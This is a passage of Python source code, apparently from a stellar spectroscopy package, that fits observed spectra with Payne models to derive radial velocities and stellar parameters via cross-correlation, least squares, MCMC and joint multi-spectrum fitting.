# The LSF information will not be correct if using Gauss-Hermite, it uses a Gaussian approximation
# it's okay because the "model" is prepared for the original spectra (above)
# Step 4: get initial RV using cross-correlation with rough sampling of Teff/logg parameter space
#------------------------------------------------------------------------------------------------
dwlog = np.median(dln.slope(np.log10(wavelog)))
# vrel = ( 10**(xshift*dwlog)-1 )*cspeed
    maxlag = int(np.ceil(np.log10(1+maxvel/cspeed)/dwlog))
maxlag = np.maximum(maxlag,50)
if samples is None:
teff = [3500.0, 4000.0, 5000.0, 6000.0, 7500.0, 15000.0, 25000.0, 40000.0, 3500.0, 4300.0, 4700.0, 5200.0]
logg = [4.8, 4.8, 4.6, 4.4, 4.0, 4.0, 4.0, 4.0, 0.5, 1.0, 2.0, 3.0]
feh = [-1.5, -0.5, -1.5, -0.5]
alphafe = [0.0, 0.0, 0.3, 0.3]
dt = np.dtype([('teff',float),('logg',float),('feh',float),('alphafe',float)])
samples = np.zeros(len(teff)*len(feh),dtype=dt)
nteff = len(teff)
for i in range(len(feh)):
samples['teff'][i*nteff:(i+1)*nteff] = teff
samples['logg'][i*nteff:(i+1)*nteff] = logg
samples['feh'][i*nteff:(i+1)*nteff] = feh[i]
samples['alphafe'][i*nteff:(i+1)*nteff] = alphafe[i]
outdtype = np.dtype([('xshift',np.float32),('vrel',np.float32),('vrelerr',np.float32),('ccpeak',np.float32),('ccpfwhm',np.float32),
('chisq',np.float32),('teff',np.float32),('logg',np.float32),('feh',np.float32),('alphafe',np.float32)])
outstr = np.zeros(len(samples),dtype=outdtype)
if verbose is True: print(' TEFF LOGG FEH ALPHAFE VREL CCPEAK CHISQ')
for i in range(len(samples)):
inpdict = {'teff':samples['teff'][i],'logg':samples['logg'][i],'fe_h':samples['feh'][i],
'alpha_h':samples['alphafe'][i]+samples['feh'][i],'rv':0.0}
labels = model.mklabels(inpdict)
m = model(labels,wave=wavelog)
outstr1 = specxcorr(m.wave,m.flux,obs.flux,obs.err,maxlag)
#if outstr1['chisq'] > 1000:
# import pdb; pdb.set_trace()
if verbose is True:
print('%7.0f %5.2f %5.2f %5.2f %8.2f %5.2f %5.2f' % (samples['teff'][i],samples['logg'][i],samples['feh'][i],
samples['alphafe'][i],outstr1['vrel'][0],outstr1['ccpeak'][0],
outstr1['chisq'][0]))
for n in ['xshift','vrel','vrelerr','ccpeak','ccpfwhm','chisq']: outstr[n][i] = outstr1[n]
outstr['teff'][i] = samples['teff'][i]
outstr['logg'][i] = samples['logg'][i]
outstr['feh'][i] = samples['feh'][i]
outstr['alphafe'][i] = samples['alphafe'][i]
#import pdb; pdb.set_trace()
# Get best fit
bestind = np.argmin(outstr['chisq'])
beststr = outstr[bestind]
bestlabels = model.mklabels({'teff':beststr['teff'],'logg':beststr['logg'],'fe_h':beststr['feh'],
'alpha_h':beststr['alphafe']+beststr['feh'],'rv':beststr['vrel']})
bestmodel = model(bestlabels)
if verbose is True:
print('Initial RV fit:')
printpars([beststr['teff'],beststr['logg'],beststr['feh'],beststr['alphafe'],beststr['vrel']],
[None,None,None,None,beststr['vrelerr']])
print('chisq = %5.2f' % beststr['chisq'])
return beststr, bestmodel
def make_payne_initlabels(labels):
""" Make initial guesses for Payne labels."""
labels = np.char.array(labels).upper()
# Initializing the labels array
nlabels = len(labels)
initpars = np.zeros(nlabels,float)
initpars[labels=='TEFF'] = 5000.0
initpars[labels=='LOGG'] = 3.5
initpars[labels.endswith('_H')] = 0.0
# Vmicro/Vturb=2.0 km/s by default
initpars[(labels=='VTURB') | (labels=='VMICRO')] = 2.0
# All abundances, VSINI, VMACRO, RV = 0.0
return initpars
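# Illustrative call (hypothetical label list):
#   make_payne_initlabels(['TEFF','LOGG','FE_H','ALPHA_H','RV'])
#   # -> array([5000., 3.5, 0., 0., 0.])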
def make_payne_bounds(labels,initpars=None):
""" Make upper and lower bounds for Payne labels."""
if initpars is None:
initpars = make_payne_initlabels(labels)
nlabels = len(labels)
lbounds = np.zeros(nlabels,np.float64)
ubounds = np.zeros(nlabels,np.float64)
# Initial guesses and bounds for the fitted parameters
for i,par in enumerate(labels):
if par.upper()=='TEFF':
lbounds[i] = np.maximum(initpars[i]-2000,3000)
ubounds[i] = initpars[i]+2000
if par.upper()=='LOGG':
lbounds[i] = np.maximum(initpars[i]-2,0)
ubounds[i] = np.minimum(initpars[i]+2,5)
if par.upper()=='VTURB':
lbounds[i] = np.maximum(initpars[i]-2,0)
ubounds[i] = initpars[i]+2
if par.upper().endswith('_H'):
lbounds[i] = np.maximum(initpars[i]-0.75,-2.5)
ubounds[i] = np.minimum(initpars[i]+0.75,0.5)
if par.upper()=='FE_H':
lbounds[i] = -2.5
ubounds[i] = 0.5
if par.upper()=='VSINI':
lbounds[i] = np.maximum(initpars[i]-20,0)
ubounds[i] = initpars[i]+50
if par.upper()=='VMACRO':
lbounds[i] = np.maximum(initpars[i]-2,0)
ubounds[i] = initpars[i]+2
if par.upper()=='RV':
lbounds[i] = -1000.0
ubounds[i] = 1000.0
bounds = (lbounds,ubounds)
return bounds
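# Illustrative call (hypothetical labels, using the default initial guesses):
#   lbounds, ubounds = make_payne_bounds(['TEFF','LOGG','FE_H','RV'])
#   # TEFF in [3000,7000], LOGG in [1.5,5.0], FE_H in [-2.5,0.5], RV in [-1000,1000]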
def fit_lsq_payne(spec,model=None,initpar=None,fitparams=None,fixparams={},verbose=False):
"""
Least Squares fitting with forward modeling of the spectrum.
Parameters
----------
spec : Spec1D object
The observed spectrum to match.
model : Payne model, optional
Payne model to use. The default is to load all of the Payne
models in the data/ directory and use those.
initpar : dictionary or array, optional
Initial estimates for parameters. If it is an array, then it is
        assumed that these are for the FITPARAMS parameters. If it is a
        dictionary, then the parameter names are explicit and they do not
        need to cover all FITPARAMS parameters. Optional.
fitparams : list of labels, optional
List of Payne parameter/label names to fit. Optional.
The default values are ['TEFF','LOGG','FE_H','ALPHA_H','RV'].
fixparams : dict, optional
Dictionary of parameters to hold fixed.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
The best-fitting Payne model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
out, bmodel = fit_lsq_payne(spec,model)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Prepare the spectrum
#-----------------------------
# normalize and mask spectrum
if spec.normalized is False:
spec = utils.specprep(spec)
    # Load and prepare the Payne models
#-------------------------------------------
if model is None:
model = payne.load_models()
# Prepare if necessary
if model.prepared is False: model.prepare(spec)
# Fitting parameters
if fitparams is None:
fitparams = ['TEFF','LOGG','FE_H','ALPHA_H','RV']
else:
fitparams = [f.upper() for f in fitparams] # all CAPS
nfitparams = len(fitparams)
nfixparams = len(fixparams)
nallparams = nfitparams+nfixparams
# Get initial estimates
# this does not need to include initial guess for all fitparams
# that's taken care of below
if initpar is not None and isinstance(initpar,dict) is False:
# Array input
# must be the initial parameters for FITPARAMS
if len(initpar)!=len(fitparams):
raise Exception("INITPAR must have same number of elements as FITPARAMS")
initpar = dict(zip(fitparams,initpar)) # make dictionary
# Make initial parameters for all labels
allinitpar = make_payne_initlabels(fitparams)
if initpar is not None:
for name in initpar.keys():
ind, = np.where(np.char.array(fitparams)==name)
if len(ind)>0:
allinitpar[ind[0]] = initpar[name]
# Initialize spectral fitter
sp = payne.PayneSpecFitter(spec,model,fitparams,fixparams,verbose=False)
# Calculate the bounds
bounds = sp.mkbounds(fitparams,allinitpar)
# Use curve_fit
tol = 5e-5 # 5e-4
dx_lim = sp.mkdxlim(fitparams)
lspars, lscov = curve_fit(sp.model,spec.wave.flatten(),spec.flux.flatten(), #dx_lim=dx_lim,
sigma=spec.err.flatten(),p0=allinitpar,bounds=bounds,jac=sp.jac)
#print(sp.nfev,sp.njac)
# If it hits a boundary then the solution won't change much compared to initpar
# setting absolute_sigma=True gives crazy low lsperror values
lsperror = np.sqrt(np.diag(lscov))
if verbose is True:
print('Least Squares RV and stellar parameters:')
printpars(lspars,names=fitparams)
if nfixparams>0:
all_labels = fitparams+list(fixparams.keys())
        all_pars = np.hstack((lspars,list(fixparams.values())))
else:
all_labels = fitparams
all_pars = lspars
bestlabels = model.mklabels(dict(zip(all_labels,all_pars)))
lsmodel = model(bestlabels)
lschisq = np.sqrt(np.sum(((spec.flux-lsmodel.flux)/spec.err)**2)/(spec.npix*spec.norder))
if verbose is True: print('chisq = %5.2f' % lschisq)
# Put it into the output structure
dtype = np.dtype([('labels','<U100',nfitparams),('pars',float,nfitparams),('parerr',float,nfitparams),
('parcov',float,(nfitparams,nfitparams)),('chisq',float)])
out = np.zeros(1,dtype=dtype)
out['labels'] = fitparams
out['pars'] = lspars
out['parerr'] = lsperror
out['parcov'] = lscov
out['chisq'] = lschisq
return out, lsmodel
def mcmc_delta_payne(labels):
""" Get MCMC deltas for the walkers."""
delta = np.zeros(len(labels),float)
for i in range(len(labels)):
name = labels[i]
if name=='TEFF':
step = 50.0
elif name=='RV':
step = 5
elif name=='VROT':
step = 5
elif name=='VMICRO':
step = 1.0
elif name.endswith('_H'):
step = 0.1
else:
step = 0.1
delta[i] = step
return delta
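# Illustrative call (hypothetical labels):
#   mcmc_delta_payne(['TEFF','LOGG','FE_H','RV'])
#   # -> array([50., 0.1, 0.1, 5.]), the step sizes used to scatter the MCMC walkers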
def fit_mcmc_payne(spec,model=None,fitparams=None,fixparams={},initpar=None,steps=100,
cornername=None,verbose=False):
"""
Fit the spectrum with MCMC.
Parameters
----------
spec : Spec1D object
The observed spectrum to match.
model: Payne model, optional
Payne model to use. The default is to load the Payne model
in the data/ directory and use those.
fitparams : list of labels, optional
List of Payne parameter/label names to fit. Optional.
The default values are ['TEFF','LOGG','FE_H','ALPHA_H','RV'].
fixparams : dict, optional
Dictionary of parameters to hold fixed.
initpar : numpy array, optional
Initial estimate for [teff, logg, feh, RV], optional.
steps : int, optional
Number of steps to use. Default is 100.
cornername : string, optional
Output filename for the corner plot. If a corner plot is requested, then the
minimum number of steps used is 500.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
        The best-fitting Payne model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
out, bmodel = fit_mcmc_payne(spec)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Prepare the spectrum
#-----------------------------
# normalize and mask spectrum
if spec.normalized is False:
spec = utils.specprep(spec)
# Fitting parameters
if fitparams is None:
fitparams = ['TEFF','LOGG','FE_H','ALPHA_H','RV']
nfitparams = len(fitparams)
nfixparams = len(fixparams)
# Load the Payne model
#-----------------------
if model is None: model = payne.load_models()
model.prepare(spec)
# Initial estimates
if initpar is None:
initpar = make_payne_initlabels(fitparams)
# Initialize spectral fitter
sp = payne.PayneSpecFitter(spec,model,fitparams,fixparams,verbose=False)
# Calculate the bounds
bounds = sp.mkbounds(fitparams,initpar)
sp.bounds = bounds
# Set up the MCMC sampler
ndim, nwalkers = nfitparams, 20
delta = mcmc_delta_payne(fitparams)
pos = [initpar + delta*np.random.randn(ndim) for i in range(nwalkers)]
sampler = emcee.EnsembleSampler(nwalkers, ndim, emcee_lnprob_payne,
args=(spec.wave.flatten(), spec.flux.flatten(), spec.err.flatten(), sp))
if cornername is not None: steps=np.maximum(steps,500) # at least 500 steps
# Run MCMC sampler
if verbose: print('Running MCMC')
out = sampler.run_mcmc(pos, steps)
    samples = sampler.chain[:, int(steps/2):, :].reshape((-1, ndim))
# Get the median and stddev values
pars = np.zeros(ndim,float)
parerr = np.zeros(ndim,float)
if verbose is True: print('MCMC values:')
for i in range(ndim):
t=np.percentile(samples[:,i],[16,50,84])
pars[i] = t[1]
parerr[i] = (t[2]-t[0])*0.5
if verbose is True: printpars(pars,parerr,names=fitparams)
# The maximum likelihood parameters
bestind = np.unravel_index(np.argmax(sampler.lnprobability),sampler.lnprobability.shape)
pars_ml = sampler.chain[bestind[0],bestind[1],:]
# Get best model
if nfixparams>0:
all_labels = fitparams+list(fixparams.keys())
        all_pars = np.hstack((pars,list(fixparams.values())))
else:
all_labels = fitparams
all_pars = pars
bestlabels = model.mklabels(dict(zip(all_labels,all_pars)))
mcmodel = model(bestlabels)
mcchisq = np.sqrt(np.sum(((spec.flux-mcmodel.flux)/spec.err)**2)/(spec.npix*spec.norder))
# Put it into the output structure
dtype = np.dtype([('pars',float,ndim),('pars_ml',float,ndim),('parerr',float,ndim),('chisq',float)])
out = np.zeros(1,dtype=dtype)
out['pars'] = pars
out['pars_ml'] = pars_ml
out['parerr'] = parerr
out['chisq'] = mcchisq
# Corner plot
if cornername is not None:
matplotlib.use('Agg')
fig = corner.corner(samples, labels=fitparams, truths=pars)
plt.savefig(cornername)
plt.close(fig)
print('Corner plot saved to '+cornername)
return out,mcmodel
def fit_payne(spectrum,model=None,fitparams=None,fixparams={},verbose=False,
figfile=None,mcmc=False,cornername=None,nthreads=None,
notweak=False,tpoly=False,tpolyorder=3):
"""
Fit the spectrum. Find the best RV and stellar parameters using the Payne model.
Parameters
----------
spectrum : Spec1D object
The observed spectrum to match.
model: Payne model, optional
Payne model to use. The default is to load the Payne model
in the data/ directory and use those.
fitparams : list of labels, optional
List of Payne parameter/label names to fit. Optional.
The default values are ['TEFF','LOGG','FE_H','ALPHA_H','RV'].
fixparams : dict, optional
Dictionary of parameters to hold fixed.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
mcmc : bool, optional
Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties.
This is False by default.
figfile : string, optional
The filename for a diagnostic plot showing the observed spectrum, model
spectrum and the best-fit parameters.
cornername : string, optional
The filename for a "corner" plot showing the posterior distributions from
the MCMC run.
nthreads : int, optional
The number of threads to use. By default the number of threads is not limited.
notweak : boolean, optional
Don't tweak the observed continuum using the model. Default is False.
tpoly : boolean, optional
Use a low-order polynomial fit for continuum tweaking. Default is False,
it uses Gaussian smoothing instead.
tpolyorder : int, optional
Polynomial order to use for continuum tweaking if tpoly=True.
Default is 3 (cubic).
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
model : Spec1D object
The best-fitting Payne model spectrum (as Spec1D object).
specm : Spec1D object
The observed spectrum with discrepant and outlier pixels masked.
Example
-------
.. code-block:: python
out, model = fit_payne(spec)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Set threads
if nthreads is not None:
os.environ["OMP_NUM_THREADS"] = str(nthreads)
os.environ["OPENBLAS_NUM_THREADS"] = str(nthreads)
os.environ["MKL_NUM_THREADS"] = str(nthreads)
os.environ["VECLIB_MAXIMUM_THREADS"] = str(nthreads)
os.environ["NUMEXPR_NUM_THREADS"] = str(nthreads)
t0 = time.time()
# Make internal copy
spec = spectrum.copy()
# Fitting parameters
if fitparams is None:
fitparams = ['TEFF','LOGG','FE_H','ALPHA_H','RV']
else:
fitparams = [f.upper() for f in fitparams]
if verbose: print('Fitting Payne model to spectrum with parameters: '+', '.join(fitparams))
nfitparams = len(fitparams)
nfixparams = len(fixparams)
# Step 1: Prepare the spectrum
#-----------------------------
# Normalize and mask the spectrum
spec = utils.specprep(spec)
# Mask out any large positive outliers, e.g. badly subtracted sky lines
specm = utils.maskoutliers(spec,verbose=verbose)
# Step 2: Load the Payne model
#------------------------------
if model is None: model = payne.load_models()
model.prepare(specm)
    # Check the input labels against the Payne model labels
fitparams = payne.check_params(model,fitparams)
if nfixparams>0:
fixparams = payne.check_params(model,fixparams)
# Step 3: Get initial RV using cross-correlation with rough sampling of Teff/logg parameter space
#------------------------------------------------------------------------------------------------
beststr, xmodel = fit_xcorrgrid_payne(specm,model,verbose=verbose,maxvel=1000.0)
# Step 4: Least Squares fitting with forward modeling
#----------------------------------------------------
# Tweak the continuum
#specm = tweakcontinuum(specm,xmodel)
# Initial estimates
initpar = {'TEFF':beststr['teff'],'LOGG':beststr['logg'],'FE_H':beststr['feh'],
'ALPHA_H':beststr['alphafe']+beststr['feh'],'RV':beststr['vrel']}
lsout0, lsmodel0 = fit_lsq_payne(specm,model,initpar=initpar,fitparams=fitparams,
fixparams=fixparams,verbose=verbose)
lspars0 = lsout0['pars'][0]
lsperror0 = lsout0['parerr'][0]
# Tweak the continuum normalization
if notweak is False:
specm = tweakcontinuum(specm,lsmodel0,usepoly=tpoly,polyorder=tpolyorder)
# Mask out very discrepant pixels when compared to the best-fit model
specm = utils.maskdiscrepant(specm,lsmodel0,verbose=verbose)
# Refit with Payne
lsout, lsmodel = fit_lsq_payne(specm,model,initpar=dict(zip(fitparams,lspars0)),
fitparams=fitparams,fixparams=fixparams,verbose=verbose)
lspars = lsout['pars'][0]
lsperror = lsout['parerr'][0]
else:
lsout = lsout0
lsmodel = lsmodel0
lspars = lspars0
lsperror = lsperror0
# Step 5: Run fine grid in RV, forward modeling
#----------------------------------------------
maxv = 10.0
rvind, = np.where(np.char.array(fitparams)=='RV')[0]
vel = dln.scale_vector(np.arange(31),lspars[rvind]-maxv,lspars[rvind]+maxv)
chisq = np.zeros(len(vel))
tinput = dict(zip(fitparams,lsout['pars'][0].copy()))
if nfixparams>0: # add fixed parameters
tinput.update(fixparams)
for i,v in enumerate(vel):
tinput['RV'] = v
tlabels = model.mklabels(tinput)
m = model(tlabels)
chisq[i] = np.sqrt(np.sum(((specm.flux-m.flux)/specm.err)**2)/(specm.npix*specm.norder))
vel2 = dln.scale_vector(np.arange(300),lspars[rvind]-maxv,lspars[rvind]+maxv)
chisq2 = dln.interp(vel,chisq,vel2)
bestind = np.argmin(chisq2)
finerv = vel2[bestind]
finechisq = chisq2[bestind]
if verbose is True:
print('Fine grid best RV = %5.2f km/s' % finerv)
print('chisq = %5.2f' % finechisq)
# Final parameters and uncertainties (so far)
fpars = lsout['pars'][0]
fperror = lsout['parerr'][0]
fpars[rvind] = finerv
fchisq = finechisq
finput = dict(zip(fitparams,fpars.copy()))
finput['RV'] = finerv
flabels = model.mklabels(finput)
fmodel = model(flabels)
# Step 6: MCMC
#--------------
if (mcmc is True) | (cornername is not None):
mcout, mcmodel = fit_mcmc_payne(specm,model,fitparams=fitparams,fixparams=fixparams,
initpar=fpars,verbose=verbose,cornername=cornername)
# Use these parameters
fpars = mcout['pars'][0]
fperror = mcout['parerr'][0]
fchisq = mcout['chisq'][0]
fmodel = mcmodel
# Construct the output
#---------------------
vrel = fpars[rvind]
vrelerr = fperror[rvind]
bc = specm.barycorr()
vhelio = vrel + bc
if verbose is True:
print('Final parameters:')
printpars(fpars,fperror,names=fitparams)
print('Vhelio = %6.2f +/- %5.2f km/s' % (vhelio,vrelerr))
print('BC = %5.2f km/s' % bc)
print('chisq = %5.2f' % fchisq)
dtlist = [('vhelio',np.float32),('vrel',np.float32),('vrelerr',np.float32)]
for k in range(nfitparams):
name = fitparams[k].lower()
        if name != 'rv': # Skip RV
dtlist += [(name,np.float32),(name+'err',np.float32)]
dtlist += [('chisq',np.float32),('bc',np.float32)]
dtype = np.dtype(dtlist)
out = np.zeros(1,dtype=dtype)
out['vhelio'] = vhelio
out['vrel'] = vrel
out['vrelerr'] = vrelerr
for k in range(nfitparams):
name = fitparams[k].lower()
        if name != 'rv': # Skip RV
out[name] = fpars[k]
out[name+'err'] = fperror[k]
out['chisq'] = fchisq
out['bc'] = bc
# Make diagnostic figure
if figfile is not None:
# Apply continuum tweak to original spectrum as well
cratio = specm.cont/spec.cont
orig = spec.copy()
orig.flux /= cratio
orig.err /= cratio
orig.cont *= cratio
# Make the diagnostic figure
annotlabels = np.char.array(fitparams).lower()
annotlabels[rvind] = 'vrel'
specfigure(figfile,specm,fmodel,out,original=orig,verbose=verbose,ispayne=True,annotlabels=annotlabels)
# How long did this take
if verbose is True: print('dt = %5.2f sec.' % (time.time()-t0))
return out, fmodel, specm
def multifit_lsq_payne(speclist,modlist,fitparams=None,fixparams={},initpar=None,verbose=False):
"""
Least Squares fitting with forward modeling of multiple spectra simultaneously.
Parameters
----------
speclist : Spec1D object
List of the observed spectra to match.
modlist : list of Doppler Payne models
A list of the prepared Doppler Payne models to use, one set for each observed
spectrum.
fitparams : list of labels, optional
List of Payne parameter/label names to fit (excluding RV). Optional.
The default values are ['TEFF','LOGG','FE_H','ALPHA_H'].
fixparams : dict, optional
Dictionary of parameters to hold fixed.
initpar : numpy array, optional
Initial estimate for [teff, logg, feh, RV, etc.], optional.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
The best-fitting Payne model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
out, bmodel = multifit_lsq_payne(speclist,modlist,initpar)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
nspec = len(speclist)
# Fitting parameters, excluding RV
if fitparams is None:
fitparams = ['TEFF','LOGG','FE_H','ALPHA_H']
# Make sure RV is excluded, that is handled separately
fitparams = np.char.array(fitparams)
fitparams = list(fitparams[np.char.array(fitparams).upper().find('RV')==-1])
nfitparams = len(fitparams)
nfixparams = len(fixparams)
# Get initial estimates
npar = nfitparams+nspec
# Initial estimates
if initpar is None:
initpar1 = make_payne_initlabels(fitparams)
initpar = np.hstack((initpar1,np.zeros(nspec,float)))
# Calculate the bounds
lbounds = np.zeros(npar,float)+1e5
ubounds = np.zeros(npar,float)-1e5
labelbounds = make_payne_bounds(fitparams,initpar[0:nfitparams])
lbounds[0:nfitparams] = labelbounds[0]
ubounds[0:nfitparams] = labelbounds[1]
lbounds[nfitparams:] = -1000
ubounds[nfitparams:] = 1000
bounds = (lbounds, ubounds)
# Initialize the fitter
spfitter = payne.PayneMultiSpecFitter(speclist,modlist,fitparams,fixparams=fixparams,verbose=verbose)
# Put all of the spectra into a large 1D array
ntotpix = 0
for s in speclist:
ntotpix += s.npix*s.norder
wave = np.zeros(ntotpix)
flux = np.zeros(ntotpix)
err = np.zeros(ntotpix)
cnt = 0
for i in range(nspec):
spec1 = speclist[i]
npx = spec1.npix*spec1.norder
wave[cnt:cnt+npx] = spec1.wave.T.flatten()
flux[cnt:cnt+npx] = spec1.flux.T.flatten()
err[cnt:cnt+npx] = spec1.err.T.flatten()
cnt += npx
# We are fitting nfitparams stellar parameters and Nspec relative RVs
lspars, lscov = curve_fit(spfitter.model, wave, flux, sigma=err, p0=initpar, bounds=bounds, jac=spfitter.jac)
    # If it hits a boundary then the solution won't change much compared to initpar
# setting absolute_sigma=True gives crazy low lsperror values
lsperror = np.sqrt(np.diag(lscov))
if verbose is True:
print('Least Squares labels and RVs:')
parnames = fitparams.copy()+list('RV'+np.char.array((np.arange(nspec)+1).astype(str)))
printpars(lspars,lsperror,names=parnames)
lsmodel = spfitter.model(wave,*lspars)
lschisq = np.sqrt(np.sum(((flux-lsmodel)/err)**2)/len(lsmodel))
if verbose is True: print('chisq = %5.2f' % lschisq)
# Put it into the output structure
dtype = np.dtype([('pars',float,npar),('parerr',float,npar),('parcov',float,(npar,npar)),('chisq',float)])
out = np.zeros(1,dtype=dtype)
out['pars'] = lspars
out['parerr'] = lsperror
out['parcov'] = lscov
out['chisq'] = lschisq
return out, lsmodel
def jointfit_payne(speclist,model=None,fitparams=None,fixparams={},mcmc=False,snrcut=10.0,
saveplot=False,verbose=False,outdir=None,nthreads=None,
notweak=False,tpoly=False,tpolyorder=3):
"""
This fits a Payne model to multiple spectra of the same star.
Parameters
----------
speclist : Spec1D object
The observed spectrum to match.
model : Payne model, optional
Payne model to use. The default is to load the Payne model
in the data/ directory and use those.
fitparams : list of labels, optional
List of Payne parameter/label names to fit (excluding RV). Optional.
The default values are ['TEFF','LOGG','FE_H','ALPHA_H'].
fixparams : dict, optional
Dictionary of parameters to hold fixed.
mcmc : bool, optional
Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties.
        This is only run when the individual spectra are being fit.
This is False by default.
snrcut : int, optional
S/N cut to fit individual spectra in the first step. The default is snrcut=10.
saveplot : bool, optional
Save output plots.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
outdir : str, optional
The directory for output files. The default is to use the current directory.
nthreads : int, optional
The number of threads to use. By default the number of threads is not limited.
notweak : boolean, optional
Don't tweak the observed continuum using the model. Default is False.
tpoly : boolean, optional
Use a low-order polynomial fit for continuum tweaking. Default is False,
it uses Gaussian smoothing instead.
tpolyorder : int, optional
Polynomial order to use for continuum tweaking if tpoly=True.
Default is 3 (cubic).
Returns
-------
sumstr : numpy structured array
Summary catalog of final best-fit values.
    final : numpy structured array
        Final best-fit values for each individual spectrum.
bmodel : List of Spec1D object
List of best-fitting model spectra.
specmlist : list of Spec1D object
        List of the observed spectra with discrepant and outlier pixels masked.
Example
-------
.. code-block:: python
sumstr, final, bmodel, specmlist = jointfit_payne(speclist)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
nspec = len(speclist)
t0 = time.time()
# Set threads
if nthreads is not None:
os.environ["OMP_NUM_THREADS"] = str(nthreads)
os.environ["OPENBLAS_NUM_THREADS"] = str(nthreads)
os.environ["MKL_NUM_THREADS"] = str(nthreads)
os.environ["VECLIB_MAXIMUM_THREADS"] = str(nthreads)
os.environ["NUMEXPR_NUM_THREADS"] = str(nthreads)
# If list of filenames input, then load them
# Load the Payne model
#---------------------
if model is None: model = payne.load_models()
# Fitting parameters, excluding RV
if fitparams is None:
fitparams = ['TEFF','LOGG','FE_H','ALPHA_H']
if verbose: print('Fitting: '+', '.join(fitparams))
# Make sure RV is excluded, that is handled separately
fitparams = np.char.array(fitparams)
fitparams = list(fitparams[np.char.array(fitparams).upper().find('RV')==-1])
nfitparams = len(fitparams)
nfixparams = len(fixparams)
if verbose: print('Jointly fitting Payne model to '+str(nspec)+' spectra with parameters: '+
', '.join(fitparams)+' and RV for each spectrum')
# Creating catalog of info on each spectrum
dtlist = [('filename',np.str,300),('snr',float),('vhelio',float),('vrel',float),('vrelerr',float)]
for k in range(nfitparams):
name = fitparams[k].lower()
dtlist += [(name,np.float32),(name+'err',np.float32)]
dtlist += [('chisq',float),('bc',float)]
dt = np.dtype(dtlist)
info = np.zeros(nspec,dtype=dt)
for n in dt.names: info[n] = np.nan
for i,s in enumerate(speclist):
info['filename'][i] = s.filename
info['snr'][i] = s.snr
# Make sure some spectra pass the S/N cut
hisnr, nhisnr = dln.where(info['snr']>snrcut)
if nhisnr < np.ceil(0.25*nspec):
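        # Sort the S/N values in decreasing order and take the value near the
        # 25th-percentile-from-the-top position (with a small-sample floor), so
        # that at least ~25% of the spectra end up above the cut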
snr = np.flip(np.sort(info['snr']))
snrcut = snr[np.maximum(np.int(np.ceil(0.25*nspec)),np.minimum(4,nspec-1))]
if verbose is True:
print('Lowering S/N cut to %5.1f so at least 25%% of the spectra pass the cut' % snrcut)
# Step 1) Loop through each spectrum and run fit()
if verbose is True: print('Step #1: Fitting the individual spectra')
specmlist = []
modlist = []
for i in range(len(speclist)):
spec = speclist[i].copy()
if verbose is True:
print('Fitting spectrum '+str(i+1))
print(speclist[i].filename)
        # Only fit spectra with S/N above the snrcut threshold
if spec.snr>snrcut:
# Save the plot, figure the output figure filename
figfile = None
if saveplot is True:
fdir, base, ext = utils.splitfilename(speclist[i].filename)
figfile = base+'_dopfit.png'
if outdir is not None: figfile = outdir+'/'+figfile
if (outdir is None) & (fdir != ''): figfile = fdir+'/'+figfile
# Fit the spectrum
fitparams1 = fitparams+['RV'] # make sure to fit the RV
out, bmodel, specm = fit_payne(spec,fitparams=fitparams1,fixparams=fixparams,
verbose=verbose,mcmc=mcmc,figfile=figfile,
notweak=notweak,tpoly=tpoly,tpolyorder=tpolyorder)
# Save the "prepared" DopplerPayneModel object, but don't
# copy the original data (~200MB).
pmodel = model.copy() # points to original data
pmodel.prepare(specm) # Now prepare the model
modlist.append(pmodel)
specmlist.append(specm.copy())
info['vhelio'][i] = out['vhelio']
info['vrel'][i] = out['vrel']
info['vrelerr'][i] = out['vrelerr']
for k in range(nfitparams):
name = fitparams[k].lower()
info[name][i] = out[name]
info[name+'err'][i] = out[name+'err']
info['chisq'][i] = out['chisq']
info['bc'][i] = out['bc']
else:
if verbose is True:
print('Skipping: S/N=%6.1f below threshold of %6.1f. Loading spectrum and preparing models.' % (spec.snr,snrcut))
# Just get the spectrum
sp = speclist[i].copy()
sp = utils.specprep(sp) # mask and normalize
# Mask outliers
sp = utils.maskoutliers(sp)
specmlist.append(sp)
# Save the "prepared" DopplerPayneModel object, but don't
# copy the original data (~200MB).
pmodel = model.copy() # points to original data
pmodel.prepare(sp) # Now prepare the model
modlist.append(pmodel)
# at least need BC
info['bc'][i] = speclist[i].barycorr()
if verbose is True: print(' ')
# Step 2) Find weighted mean labels
if verbose is True: print('Step #2: Getting weighted mean labels')
gd, ngd = dln.where(np.isfinite(info['chisq']))
if ngd>0:
pars = list(np.char.array(fitparams).lower())+['vhelio']
parerr = list(np.char.array(fitparams).lower()+'err')+['vrelerr']
wtpars = np.zeros(len(pars),float)
for i in range(len(pars)):
p = info[pars[i]][gd]
perr = info[parerr[i]][gd]
gdp,ngdp,bdp,nbdp = dln.where(perr > 0.0,comp=True)
# Weighted by 1/perr^2
if ngdp>0:
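                # Spectra with non-positive reported errors get twice the largest
                # valid error so they carry little weight in the mean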
if (nbdp>0): perr[bdp] = np.max(perr[gdp])*2
mnp = dln.wtmean(p,perr)
wtpars[i] = mnp
# Unweighted
else:
wtpars[i] = np.mean(p)
if verbose is True:
print('Initial weighted parameters are:')
printpars(wtpars,names=np.char.array(pars).upper())
else:
wtpars = np.zeros(nfitparams+1,float)
wtpars = make_payne_initlabels(fitparams+['RV'])
if verbose is True:
            print('No good fits. Using these as initial guesses:')
printpars(wtpars)
# Make initial guesses for all the parameters, nfitparams labels and Nspec relative RVs
